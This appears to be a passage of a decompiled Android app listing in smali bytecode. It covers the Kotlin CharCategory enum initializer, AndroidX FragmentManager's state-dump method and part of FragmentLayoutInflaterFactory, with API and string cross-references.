                        75const/16 v2, 0x8
                        77const-string v3, "Mc"
                        79invoke-direct {v0, v1, v2, v2, v3}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        80sput-object v0, Lkotlin/text/CharCategory;->COMBINING_SPACING_MARK:Lkotlin/text/CharCategory;
                        81new-instance v0, Lkotlin/text/CharCategory;
                        83const-string v1, "DECIMAL_DIGIT_NUMBER"
                        84const/16 v2, 0x9
                        86const-string v3, "Nd"
                        88invoke-direct {v0, v1, v2, v2, v3}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        89sput-object v0, Lkotlin/text/CharCategory;->DECIMAL_DIGIT_NUMBER:Lkotlin/text/CharCategory;
                        90new-instance v0, Lkotlin/text/CharCategory;
                        92const-string v1, "LETTER_NUMBER"
                        93const/16 v2, 0xa
                        95const-string v3, "Nl"
                        97invoke-direct {v0, v1, v2, v2, v3}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        98sput-object v0, Lkotlin/text/CharCategory;->LETTER_NUMBER:Lkotlin/text/CharCategory;
                        99new-instance v0, Lkotlin/text/CharCategory;
                        101const-string v1, "OTHER_NUMBER"
                        102const/16 v2, 0xb
                        104const-string v3, "No"
                        106invoke-direct {v0, v1, v2, v2, v3}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        107sput-object v0, Lkotlin/text/CharCategory;->OTHER_NUMBER:Lkotlin/text/CharCategory;
                        108new-instance v0, Lkotlin/text/CharCategory;
                        110const-string v1, "SPACE_SEPARATOR"
                        111const/16 v2, 0xc
                        113const-string v3, "Zs"
                        115invoke-direct {v0, v1, v2, v2, v3}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        116sput-object v0, Lkotlin/text/CharCategory;->SPACE_SEPARATOR:Lkotlin/text/CharCategory;
                        117new-instance v0, Lkotlin/text/CharCategory;
                        119const-string v1, "LINE_SEPARATOR"
                        120const/16 v2, 0xd
                        122const-string v3, "Zl"
                        124invoke-direct {v0, v1, v2, v2, v3}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        125sput-object v0, Lkotlin/text/CharCategory;->LINE_SEPARATOR:Lkotlin/text/CharCategory;
                        126new-instance v0, Lkotlin/text/CharCategory;
                        128const-string v1, "PARAGRAPH_SEPARATOR"
                        129const/16 v2, 0xe
                        131const-string v3, "Zp"
                        133invoke-direct {v0, v1, v2, v2, v3}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        134sput-object v0, Lkotlin/text/CharCategory;->PARAGRAPH_SEPARATOR:Lkotlin/text/CharCategory;
                        135new-instance v0, Lkotlin/text/CharCategory;
                        137const-string v1, "CONTROL"
                        138const/16 v2, 0xf
                        140const-string v3, "Cc"
                        142invoke-direct {v0, v1, v2, v2, v3}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        143sput-object v0, Lkotlin/text/CharCategory;->CONTROL:Lkotlin/text/CharCategory;
                        144new-instance v0, Lkotlin/text/CharCategory;
                        146const-string v1, "FORMAT"
                        147const/16 v2, 0x10
                        149const-string v3, "Cf"
                        151invoke-direct {v0, v1, v2, v2, v3}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        152sput-object v0, Lkotlin/text/CharCategory;->FORMAT:Lkotlin/text/CharCategory;
                        153new-instance v0, Lkotlin/text/CharCategory;
                        155const-string v1, "PRIVATE_USE"
                        156const/16 v2, 0x11
                        157const/16 v3, 0x12
                        159const-string v4, "Co"
                        161invoke-direct {v0, v1, v2, v3, v4}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        162sput-object v0, Lkotlin/text/CharCategory;->PRIVATE_USE:Lkotlin/text/CharCategory;
                        163new-instance v0, Lkotlin/text/CharCategory;
                        165const-string v1, "SURROGATE"
                        166const/16 v2, 0x13
                        168const-string v4, "Cs"
                        170invoke-direct {v0, v1, v3, v2, v4}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        171sput-object v0, Lkotlin/text/CharCategory;->SURROGATE:Lkotlin/text/CharCategory;
                        172new-instance v0, Lkotlin/text/CharCategory;
                        174const-string v1, "DASH_PUNCTUATION"
                        175const/16 v3, 0x14
                        177const-string v4, "Pd"
                        179invoke-direct {v0, v1, v2, v3, v4}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        180sput-object v0, Lkotlin/text/CharCategory;->DASH_PUNCTUATION:Lkotlin/text/CharCategory;
                        181new-instance v0, Lkotlin/text/CharCategory;
                        183const-string v1, "START_PUNCTUATION"
                        184const/16 v2, 0x15
                        186const-string v4, "Ps"
                        188invoke-direct {v0, v1, v3, v2, v4}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        189sput-object v0, Lkotlin/text/CharCategory;->START_PUNCTUATION:Lkotlin/text/CharCategory;
                        190new-instance v0, Lkotlin/text/CharCategory;
                        192const-string v1, "END_PUNCTUATION"
                        193const/16 v3, 0x16
                        195const-string v4, "Pe"
                        197invoke-direct {v0, v1, v2, v3, v4}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        198sput-object v0, Lkotlin/text/CharCategory;->END_PUNCTUATION:Lkotlin/text/CharCategory;
                        199new-instance v0, Lkotlin/text/CharCategory;
                        201const-string v1, "CONNECTOR_PUNCTUATION"
                        202const/16 v2, 0x17
                        204const-string v4, "Pc"
                        206invoke-direct {v0, v1, v3, v2, v4}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        207sput-object v0, Lkotlin/text/CharCategory;->CONNECTOR_PUNCTUATION:Lkotlin/text/CharCategory;
                        208new-instance v0, Lkotlin/text/CharCategory;
                        210const-string v1, "OTHER_PUNCTUATION"
                        211const/16 v3, 0x18
                        213const-string v4, "Po"
                        215invoke-direct {v0, v1, v2, v3, v4}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        216sput-object v0, Lkotlin/text/CharCategory;->OTHER_PUNCTUATION:Lkotlin/text/CharCategory;
                        217new-instance v0, Lkotlin/text/CharCategory;
                        219const-string v1, "MATH_SYMBOL"
                        220const/16 v2, 0x18
                        221const/16 v3, 0x19
                        223const-string v4, "Sm"
                        225invoke-direct {v0, v1, v2, v3, v4}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        226sput-object v0, Lkotlin/text/CharCategory;->MATH_SYMBOL:Lkotlin/text/CharCategory;
                        227new-instance v0, Lkotlin/text/CharCategory;
                        229const-string v1, "CURRENCY_SYMBOL"
                        230const/16 v2, 0x19
                        231const/16 v3, 0x1a
                        233const-string v4, "Sc"
                        235invoke-direct {v0, v1, v2, v3, v4}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        236sput-object v0, Lkotlin/text/CharCategory;->CURRENCY_SYMBOL:Lkotlin/text/CharCategory;
                        237new-instance v0, Lkotlin/text/CharCategory;
                        239const-string v1, "MODIFIER_SYMBOL"
                        240const/16 v2, 0x1a
                        241const/16 v3, 0x1b
                        243const-string v4, "Sk"
                        245invoke-direct {v0, v1, v2, v3, v4}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        246sput-object v0, Lkotlin/text/CharCategory;->MODIFIER_SYMBOL:Lkotlin/text/CharCategory;
                        247new-instance v0, Lkotlin/text/CharCategory;
                        249const-string v1, "OTHER_SYMBOL"
                        250const/16 v2, 0x1b
                        251const/16 v3, 0x1c
                        253const-string v4, "So"
                        255invoke-direct {v0, v1, v2, v3, v4}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        256sput-object v0, Lkotlin/text/CharCategory;->OTHER_SYMBOL:Lkotlin/text/CharCategory;
                        257new-instance v0, Lkotlin/text/CharCategory;
                        259const-string v1, "INITIAL_QUOTE_PUNCTUATION"
                        260const/16 v2, 0x1c
                        261const/16 v3, 0x1d
                        263const-string v4, "Pi"
                        265invoke-direct {v0, v1, v2, v3, v4}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        266sput-object v0, Lkotlin/text/CharCategory;->INITIAL_QUOTE_PUNCTUATION:Lkotlin/text/CharCategory;
                        267new-instance v0, Lkotlin/text/CharCategory;
                        269const-string v1, "FINAL_QUOTE_PUNCTUATION"
                        270const/16 v2, 0x1d
                        271const/16 v3, 0x1e
                        273const-string v4, "Pf"
                        275invoke-direct {v0, v1, v2, v3, v4}, Lkotlin/text/CharCategory;-><init>(Ljava/lang/String;IILjava/lang/String;)V
                        276sput-object v0, Lkotlin/text/CharCategory;->FINAL_QUOTE_PUNCTUATION:Lkotlin/text/CharCategory;
                        278invoke-static {}, Lkotlin/text/CharCategory;->$values()[Lkotlin/text/CharCategory;
                        279move-result-object v0
                        280sput-object v0, Lkotlin/text/CharCategory;->$VALUES:[Lkotlin/text/CharCategory;
                        281new-instance v0, Lkotlin/text/CharCategory$Companion;
                        282const/4 v1, 0x0
                        284invoke-direct {v0, v1}, Lkotlin/text/CharCategory$Companion;-><init>(Lkotlin/jvm/internal/DefaultConstructorMarker;)V
                        285sput-object v0, Lkotlin/text/CharCategory;->Companion:Lkotlin/text/CharCategory$Companion;
                        286return-void
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.util.ArrayList.size
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.println
                        • java.util.ArrayList.get
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.println
                        • java.util.ArrayList.size
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.println
                        • java.util.ArrayList.get
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.println
                        • java.io.PrintWriter.print
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.util.concurrent.atomic.AtomicInteger.get
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.io.PrintWriter.println
                        • java.util.ArrayList.size
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.println
                        • java.util.ArrayList.get
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.println
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.println
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.println
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.println
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.println
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.println
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.print
                        • java.io.PrintWriter.println
                        Strings
                        • Fragments Created Menus:
                        • #
                        • :
                        • Back Stack:
                        • Back Stack Index:
                        • Pending Actions:
                        • FragmentManager misc state:
                        • mHost=
                        • mContainer=
                        • mParent=
                        • mCurState=
                        • mStateSaved=
                        • mStopped=
                        • mDestroyed=
                        • mNeedMenuInvalidate=
                        Position Instruction Meta Information
                        0new-instance v0, Ljava/lang/StringBuilder;
                        2invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        4invoke-virtual {v0, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        6const-string v1, " "
                        8invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        10invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        11move-result-object v0
                        13iget-object v1, p0, Landroidx/fragment/app/FragmentManager;->mFragmentStore:Landroidx/fragment/app/FragmentStore;
                        15invoke-virtual {v1, p1, p2, p3, p4}, Landroidx/fragment/app/FragmentStore;->dump(Ljava/lang/String;Ljava/io/FileDescriptor;Ljava/io/PrintWriter;[Ljava/lang/String;)V
                        17iget-object p2, p0, Landroidx/fragment/app/FragmentManager;->mCreatedMenus:Ljava/util/ArrayList;
                        18const/4 p4, 0x0
                        19if-eqz p2, :cond_4e
                        21invoke-virtual {p2}, Ljava/util/ArrayList;->size()I
                        22move-result p2
                        23if-lez p2, :cond_4e
                        25invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        27const-string v1, "Fragments Created Menus:"
                        29invoke-virtual {p3, v1}, Ljava/io/PrintWriter;->println(Ljava/lang/String;)V
                        30const/4 v1, 0x0
                        31goto_2a: if-ge v1, p2, :cond_4e
                        33iget-object v2, p0, Landroidx/fragment/app/FragmentManager;->mCreatedMenus:Ljava/util/ArrayList;
                        35invoke-virtual {v2, v1}, Ljava/util/ArrayList;->get(I)Ljava/lang/Object;
                        36move-result-object v2
                        37check-cast v2, Landroidx/fragment/app/Fragment;
                        39invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        41const-string v3, " #"
                        43invoke-virtual {p3, v3}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        45invoke-virtual {p3, v1}, Ljava/io/PrintWriter;->print(I)V
                        47const-string v3, ": "
                        49invoke-virtual {p3, v3}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        51invoke-virtual {v2}, Landroidx/fragment/app/Fragment;->toString()Ljava/lang/String;
                        52move-result-object v2
                        54invoke-virtual {p3, v2}, Ljava/io/PrintWriter;->println(Ljava/lang/String;)V
                        55add-int/lit8 v1, v1, 0x1
                        56goto/16 :goto_2a
                        57cond_4e:
                        58iget-object p2, p0, Landroidx/fragment/app/FragmentManager;->mBackStack:Ljava/util/ArrayList;
                        59if-eqz p2, :cond_88
                        61invoke-virtual {p2}, Ljava/util/ArrayList;->size()I
                        62move-result p2
                        63if-lez p2, :cond_88
                        65invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        67const-string v1, "Back Stack:"
                        69invoke-virtual {p3, v1}, Ljava/io/PrintWriter;->println(Ljava/lang/String;)V
                        70const/4 v1, 0x0
                        71goto_61: if-ge v1, p2, :cond_88
                        73iget-object v2, p0, Landroidx/fragment/app/FragmentManager;->mBackStack:Ljava/util/ArrayList;
                        75invoke-virtual {v2, v1}, Ljava/util/ArrayList;->get(I)Ljava/lang/Object;
                        76move-result-object v2
                        77check-cast v2, Landroidx/fragment/app/BackStackRecord;
                        79invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        81const-string v3, " #"
                        83invoke-virtual {p3, v3}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        85invoke-virtual {p3, v1}, Ljava/io/PrintWriter;->print(I)V
                        87const-string v3, ": "
                        89invoke-virtual {p3, v3}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        91invoke-virtual {v2}, Landroidx/fragment/app/BackStackRecord;->toString()Ljava/lang/String;
                        92move-result-object v3
                        94invoke-virtual {p3, v3}, Ljava/io/PrintWriter;->println(Ljava/lang/String;)V
                        96invoke-virtual {v2, v0, p3}, Landroidx/fragment/app/BackStackRecord;->dump(Ljava/lang/String;Ljava/io/PrintWriter;)V
                        97add-int/lit8 v1, v1, 0x1
                        98goto/16 :goto_61
                        99cond_88:
                        100invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        101new-instance p2, Ljava/lang/StringBuilder;
                        103invoke-direct {p2}, Ljava/lang/StringBuilder;-><init>()V
                        105const-string v0, "Back Stack Index: "
                        107invoke-virtual {p2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        109iget-object v0, p0, Landroidx/fragment/app/FragmentManager;->mBackStackIndex:Ljava/util/concurrent/atomic/AtomicInteger;
                        111invoke-virtual {v0}, Ljava/util/concurrent/atomic/AtomicInteger;->get()I
                        112move-result v0
                        114invoke-virtual {p2, v0}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        116invoke-virtual {p2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        117move-result-object p2
                        119invoke-virtual {p3, p2}, Ljava/io/PrintWriter;->println(Ljava/lang/String;)V
                        121iget-object p2, p0, Landroidx/fragment/app/FragmentManager;->mPendingActions:Ljava/util/ArrayList;
                        122monitor-enter p2
                        123try_start_a8:
                        124iget-object v0, p0, Landroidx/fragment/app/FragmentManager;->mPendingActions:Ljava/util/ArrayList;
                        126invoke-virtual {v0}, Ljava/util/ArrayList;->size()I
                        127move-result v0
                        128if-lez v0, :cond_d8
                        130invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        132const-string v1, "Pending Actions:"
                        134invoke-virtual {p3, v1}, Ljava/io/PrintWriter;->println(Ljava/lang/String;)V
                        135goto_b8: if-ge p4, v0, :cond_d8
                        137iget-object v1, p0, Landroidx/fragment/app/FragmentManager;->mPendingActions:Ljava/util/ArrayList;
                        139invoke-virtual {v1, p4}, Ljava/util/ArrayList;->get(I)Ljava/lang/Object;
                        140move-result-object v1
                        141check-cast v1, Landroidx/fragment/app/FragmentManager$OpGenerator;
                        143invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        145const-string v2, " #"
                        147invoke-virtual {p3, v2}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        149invoke-virtual {p3, p4}, Ljava/io/PrintWriter;->print(I)V
                        151const-string v2, ": "
                        153invoke-virtual {p3, v2}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        155invoke-virtual {p3, v1}, Ljava/io/PrintWriter;->println(Ljava/lang/Object;)V
                        156add-int/lit8 p4, p4, 0x1
                        157goto/16 :goto_b8
                        158cond_d8: monitor-exit p2
                        159try_end_d9:
                        160invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        162const-string p2, "FragmentManager misc state:"
                        164invoke-virtual {p3, p2}, Ljava/io/PrintWriter;->println(Ljava/lang/String;)V
                        166invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        168const-string p2, " mHost="
                        170invoke-virtual {p3, p2}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        172iget-object p2, p0, Landroidx/fragment/app/FragmentManager;->mHost:Landroidx/fragment/app/FragmentHostCallback;
                        174invoke-virtual {p3, p2}, Ljava/io/PrintWriter;->println(Ljava/lang/Object;)V
                        176invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        178const-string p2, " mContainer="
                        180invoke-virtual {p3, p2}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        182iget-object p2, p0, Landroidx/fragment/app/FragmentManager;->mContainer:Landroidx/fragment/app/FragmentContainer;
                        184invoke-virtual {p3, p2}, Ljava/io/PrintWriter;->println(Ljava/lang/Object;)V
                        186iget-object p2, p0, Landroidx/fragment/app/FragmentManager;->mParent:Landroidx/fragment/app/Fragment;
                        187if-eqz p2, :cond_10c
                        189invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        191const-string p2, " mParent="
                        193invoke-virtual {p3, p2}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        195iget-object p2, p0, Landroidx/fragment/app/FragmentManager;->mParent:Landroidx/fragment/app/Fragment;
                        197invoke-virtual {p3, p2}, Ljava/io/PrintWriter;->println(Ljava/lang/Object;)V
                        198cond_10c:
                        199invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        201const-string p2, " mCurState="
                        203invoke-virtual {p3, p2}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        204iget p2, p0, Landroidx/fragment/app/FragmentManager;->mCurState:I
                        206invoke-virtual {p3, p2}, Ljava/io/PrintWriter;->print(I)V
                        208const-string p2, " mStateSaved="
                        210invoke-virtual {p3, p2}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        211iget-boolean p2, p0, Landroidx/fragment/app/FragmentManager;->mStateSaved:Z
                        213invoke-virtual {p3, p2}, Ljava/io/PrintWriter;->print(Z)V
                        215const-string p2, " mStopped="
                        217invoke-virtual {p3, p2}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        218iget-boolean p2, p0, Landroidx/fragment/app/FragmentManager;->mStopped:Z
                        220invoke-virtual {p3, p2}, Ljava/io/PrintWriter;->print(Z)V
                        222const-string p2, " mDestroyed="
                        224invoke-virtual {p3, p2}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        225iget-boolean p2, p0, Landroidx/fragment/app/FragmentManager;->mDestroyed:Z
                        227invoke-virtual {p3, p2}, Ljava/io/PrintWriter;->println(Z)V
                        228iget-boolean p2, p0, Landroidx/fragment/app/FragmentManager;->mNeedMenuInvalidate:Z
                        229if-eqz p2, :cond_148
                        231invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        233const-string p1, " mNeedMenuInvalidate="
                        235invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->print(Ljava/lang/String;)V
                        236iget-boolean p1, p0, Landroidx/fragment/app/FragmentManager;->mNeedMenuInvalidate:Z
                        238invoke-virtual {p3, p1}, Ljava/io/PrintWriter;->println(Z)V
                        239cond_148: return-void
                        240catchall_149: move-exception p1
                        241try_start_14a: monitor-exit p2
                        242try_end_14b: goto/16 :goto_14d
                        243goto_14c: throw p1
                        244goto_14d: goto/16 :goto_14c
                        Cross References
                        APIs
                        • java.lang.Class.getName
                        • java.lang.String.equals
                        • androidx.fragment.app.FragmentContainerView.<init>
                        • java.lang.String.equals
                        • android.util.AttributeSet.getAttributeValue
                        • android.content.Context.obtainStyledAttributes
                        • android.content.res.TypedArray.getString
                        • android.content.res.TypedArray.getResourceId
                        • android.content.res.TypedArray.getString
                        • android.content.res.TypedArray.recycle
                        • android.content.Context.getClassLoader
                        • android.view.View.getId
                        • java.lang.StringBuilder.<init>
                        • android.util.AttributeSet.getPositionDescription
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.IllegalArgumentException.<init>
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.Integer.toHexString
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.util.Log.v
                        • android.content.Context.getClassLoader
                        • android.view.View.setId
                        • android.view.View.getTag
                        • android.view.View.setTag
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.IllegalStateException.<init>
                        • java.lang.StringBuilder.<init>
                        • android.util.AttributeSet.getPositionDescription
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.Integer.toHexString
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.Integer.toHexString
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.IllegalArgumentException.<init>
                        Strings
                        • fragment
                        • class
                        • : Must specify unique android:id, android:tag, or have a parent with an id for
                        • onCreateView: id=0x
                        • fname=
                        • existing=
                        • FragmentManager
                        • Fragment
                        • did not create a view.
                        • : Duplicate id 0x
                        • , tag
                        • , or parent id 0x
                        • with another fragment for
                        Position Instruction Meta Information
                        0const-class v0, Landroidx/fragment/app/FragmentContainerView;
                        2invoke-virtual {v0}, Ljava/lang/Class;->getName()Ljava/lang/String;
                        3move-result-object v0
                        5invoke-virtual {v0, p2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        6move-result v0
                        7if-eqz v0, :cond_14
                        8new-instance p1, Landroidx/fragment/app/FragmentContainerView;
                        10iget-object p2, p0, Landroidx/fragment/app/FragmentLayoutInflaterFactory;->mFragmentManager:Landroidx/fragment/app/FragmentManager;
                        12invoke-direct {p1, p3, p4, p2}, Landroidx/fragment/app/FragmentContainerView;-><init>(Landroid/content/Context;Landroid/util/AttributeSet;Landroidx/fragment/app/FragmentManager;)V
                        13return-object p1
                        14cond_14:
                        15const-string v0, "fragment"
                        17invoke-virtual {v0, p2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        18move-result p2
                        19const/4 v0, 0x0
                        20if-nez p2, :cond_1e
                        21return-object v0
                        22cond_1e:
                        23const-string p2, "class"
                        25invoke-interface {p4, v0, p2}, Landroid/util/AttributeSet;->getAttributeValue(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        26move-result-object p2
                        28sget-object v1, Landroidx/fragment/R$styleable;->Fragment:[I
                        30invoke-virtual {p3, p4, v1}, Landroid/content/Context;->obtainStyledAttributes(Landroid/util/AttributeSet;[I)Landroid/content/res/TypedArray;
                        31move-result-object v1
                        32if-nez p2, :cond_32
                        33sget p2, Landroidx/fragment/R$styleable;->Fragment_android_name:I
                        35invoke-virtual {v1, p2}, Landroid/content/res/TypedArray;->getString(I)Ljava/lang/String;
                        36move-result-object p2
                        37cond_32: sget v2, Landroidx/fragment/R$styleable;->Fragment_android_id:I
                        38const/4 v3, -0x1
                        40invoke-virtual {v1, v2, v3}, Landroid/content/res/TypedArray;->getResourceId(II)I
                        41move-result v2
                        42sget v4, Landroidx/fragment/R$styleable;->Fragment_android_tag:I
                        44invoke-virtual {v1, v4}, Landroid/content/res/TypedArray;->getString(I)Ljava/lang/String;
                        45move-result-object v4
                        47invoke-virtual {v1}, Landroid/content/res/TypedArray;->recycle()V
                        48if-eqz p2, :cond_1af
                        50invoke-virtual {p3}, Landroid/content/Context;->getClassLoader()Ljava/lang/ClassLoader;
                        51move-result-object v1
                        53invoke-static {v1, p2}, Landroidx/fragment/app/FragmentFactory;->isFragmentClass(Ljava/lang/ClassLoader;Ljava/lang/String;)Z
                        54move-result v1
                        55if-nez v1, :cond_50
                        56goto/16 :goto_1af
                        57cond_50: if-eqz p1, :cond_57
                        59invoke-virtual {p1}, Landroid/view/View;->getId()I
                        60move-result p1
                        61goto/16 :goto_58
                        62cond_57: const/4 p1, 0x0
                        63goto_58: if-ne p1, v3, :cond_7d
                        64if-ne v2, v3, :cond_7d
                        65if-eqz v4, :cond_5f
                        66goto/16 :goto_7d
                        67cond_5f: new-instance p1, Ljava/lang/IllegalArgumentException;
                        68new-instance p3, Ljava/lang/StringBuilder;
                        70invoke-direct {p3}, Ljava/lang/StringBuilder;-><init>()V
                        72invoke-interface {p4}, Landroid/util/AttributeSet;->getPositionDescription()Ljava/lang/String;
                        73move-result-object p4
                        75invoke-virtual {p3, p4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        77const-string p4, ": Must specify unique android:id, android:tag, or have a parent with an id for "
                        79invoke-virtual {p3, p4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        81invoke-virtual {p3, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        83invoke-virtual {p3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        84move-result-object p2
                        86invoke-direct {p1, p2}, Ljava/lang/IllegalArgumentException;-><init>(Ljava/lang/String;)V
                        87throw p1
                        88cond_7d: if-eq v2, v3, :cond_85
                        90iget-object v0, p0, Landroidx/fragment/app/FragmentLayoutInflaterFactory;->mFragmentManager:Landroidx/fragment/app/FragmentManager;
                        92invoke-virtual {v0, v2}, Landroidx/fragment/app/FragmentManager;->findFragmentById(I)Landroidx/fragment/app/Fragment;
                        93move-result-object v0
                        94cond_85: if-nez v0, :cond_8f
                        95if-eqz v4, :cond_8f
                        97iget-object v0, p0, Landroidx/fragment/app/FragmentLayoutInflaterFactory;->mFragmentManager:Landroidx/fragment/app/FragmentManager;
                        99invoke-virtual {v0, v4}, Landroidx/fragment/app/FragmentManager;->findFragmentByTag(Ljava/lang/String;)Landroidx/fragment/app/Fragment;
                        100move-result-object v0
                        101cond_8f: if-nez v0, :cond_99
                        102if-eq p1, v3, :cond_99
                        104iget-object v0, p0, Landroidx/fragment/app/FragmentLayoutInflaterFactory;->mFragmentManager:Landroidx/fragment/app/FragmentManager;
                        106invoke-virtual {v0, p1}, Landroidx/fragment/app/FragmentManager;->findFragmentById(I)Landroidx/fragment/app/Fragment;
                        107move-result-object v0
                        108cond_99: const/4 v1, 0x2
                        110invoke-static {v1}, Landroidx/fragment/app/FragmentManager;->isLoggingEnabled(I)Z
                        111move-result v1
                        112if-eqz v1, :cond_ca
                        113new-instance v1, Ljava/lang/StringBuilder;
